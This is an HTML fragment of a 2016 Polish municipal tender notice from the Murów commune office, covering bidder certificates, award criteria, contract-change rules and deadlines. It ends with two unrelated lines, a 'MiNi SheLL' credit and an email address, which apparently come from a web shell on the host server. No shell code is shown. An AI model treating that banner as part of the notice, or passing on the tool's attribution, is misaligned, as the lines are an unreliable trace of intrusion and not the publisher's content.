<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualny odpis z właściwego rejestru, aktualny statut spółki lub aktualny rejestr  handlowy, pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa.

2. Pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie 
 zamówienia publicznego ( ( art. 23 ust. 2 ustawy Pzp-dot. Wykonawców wspólnie 
 ubiegających się o zamówienie). Dokument ten wylicza wszystkich Wykonawców 
wspólnie ubiegających się o zamówienie. Każdy z nich musi się pod nim podpisać.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - okres gwarancji i rękojmi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna  w szczególnie uzasadnionych przypadkach, na zasadach wskazanych ust. 2 -10.
2.	Zmiana może obejmować:
1)	zmiany wprowadzone przez Zamawiającego polegające w szczególności na:
-wykonaniu rozwiązań zamiennych w stosunku do przewidzianych w Dokumentacji projektowej inwestycji, zmiana taka może być spowodowana pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót. Każdorazowo na taką zmianę musi wyrazić projektant sprawujący nadzór autorski,
2)	pominięciu/ rezygnacji z jakiejkolwiek części robót ( jednak bez prawa zlecenia jej osobom trzecim),
3)	zmiana w kolejności i terminach wykonywania Robót, w tym końcowego terminu wykonania Umowy, wymuszone okolicznościami niedającymi się wcześniej przewidzieć w szczególności wynikającymi ze zmian umów z podwykonawcami lub dalszymi podwykonawcami,
4)	zastąpienie zakresu planowanych do wykonania Robót innym zakresem Robót przy zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji umowy,
5)	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczność wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji gdy wykonanie tych robót zamiennych będzie niezbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru przepisami wykonania przedmiotu umowy, zgłoszonych przez Kierownika Budowy lub Inspektora Nadzoru. Przed podjęciem decyzji przez Zamawiającego o wykonaniu robót zamiennych, Wykonawca będzie jednak zobowiązany do przedłożenia kosztorysu zamiennego na rozwiązania zamienne. Podstawą do wykonania rozwiązań/ robót zamiennych niezbędny jest protokół konieczności, podpisany przez Zamawiającego i Wykonawcę lub ich upoważnionych przedstawicieli,
6)	w szczególnie uzasadnionych przypadkach zmianę części zamówienia planowanej do powierzenia podwykonawcom ( w stosunku do części wskazanych w Formularzu Oferty)/ zmianę zakresu robót planowanych do powierzenia podwykonawcom, lub zmianę podwykonawcy, przy czym jeżeli ta zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
7)	zmiany wynikające z innych przyczyn zewnętrznych niezależnych od Wykonawcy lub Zamawiającego skutkujące niemożnością wykonywania robót przez Wykonawcę lub wykonywania innych czynności przewidzianych Umową przykładowo przez;
-działania osób trzecich ( np. właściwych instytucji, organów, w tym instytucji współfinansującej inwestycję,
-warunkami atmosferycznymi uniemożliwiającymi realizację Umowy, stanowiącymi siłę wyższą,
-koniecznością podjęcia robót dodatkowych ( w ramach odrębnego zamówienia), niezbędnych do prawidłowej realizacji Umowy,
8)	zmiany specjalistów,
9)	zmiany wysokości należnych podatków i opłat w szczególności zmiany stawki podatku VAT,
10)	inną okolicznością prawną, ekonomiczną lub techniczną skutkującą niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ,
3.	Zmiany mogą być wprowadzone jedną z następujących metod:
1)	Wykonawca może zaproponować Zmianę, przez złożenie pisemnej propozycji zmian, które zdaniem Wykonawcy w razie przyjęcia pozwolą skrócić okres realizacji umowy lub obniża  koszt realizacji umowy lub w inny sposób będą korzystne dla Zamawiającego,
2)	Zamawiający może przedłożyć propozycję zmian, jeżeli ich wprowadzenie jest konieczne dla prawidłowej realizacji umowy , które w razie przyjęcia pozwolą skrócić okres realizacji Umowy lub obniżą koszty realizacji Umowy lub w inny sposób będą korzystne dla Zamawiającego  lub jeżeli konieczność ich wprowadzenia wynika ze zmiany prawa lub ze zmiany okoliczności, której nie można było przewidzieć w chwili zawarcia Umowy.
4.	Każda ze stron przedkładając drugiej stronie propozycję zmian spełniającą wymogi określone w ust. 3, wraz z tą propozycją przedłoży:
1)	opis proponowanych zmian i harmonogram wykonania zmian,

2)	W przypadku opisanym w ust. 2 pkt. 6) szczegółowe wskazanie okoliczności rzutujących na konieczność zmiany części zamówienia planowanej do powierzenia podwykonawcom ( w stosunku do części wskazanych w Formularzu Oferty/ zmiany zakresu prac planowanych do powierzenia podwykonawcom lub zmiany podwykonawcy wraz ze wskazaniem okoliczności powodujących, iż zmiana nie była możliwa do przewidzenia w szczególności na etapie składania ofert oraz jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp,- dokumenty, o których mowa w ust. 2 pkt. 5).
5.	Po otrzymaniu propozycji, Wykonawca albo Zamawiający, w porozumieniu z Inspektorem Nadzoru, ( w zależności od przypadku) w terminie 14 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany, bądź w tym terminie wystąpi do strony występującej z propozycją zmian przesyłając zmodyfikowaną propozycją zmian spełniającą wymogi opisane w ust. 4.
6.	W przypadku upływu terminu podanego w ust. 5 traktuje się, iż propozycja wprowadzenia zmian została odrzucona.
7.	Do przesłanych zmodyfikowanych propozycji zmian mają zastosowanie postanowienia ust. 5-6.
8.	W przypadku przyjęcia propozycji zmian wchodzą one w życie pod warunkiem objęcia ich pisemnym aneksem.

9.	Zmiana Umowy dokonana z naruszeniem postanowień ust. 1-8jest nieważna.
10.	Nie stanowi zmiany umowy w rozumieniu art.11 ustawy Praw zamówień publicznych :
a)	zmiana danych osobowych związanych z obsługą administracyjno- organizacyjną umowy,
b)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia strony umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
11.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może   wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia tej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Murowie ul. Dworcowa 2 46-030 Murów, pokój nr 19 nieodpłatnie.
Na wniosek Wykonawcy Zamawiający prześle specyfikację pocztą wówczas pobierze tylko koszty przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2016 godzina 10:00, miejsce: Urząd Gminy w Murowie ul. Dworcowa 2 46-030 Murów  I piętro /sala ślubów/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowane z Programu Rozwoju Regionalnego Infrastruktury Sportowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com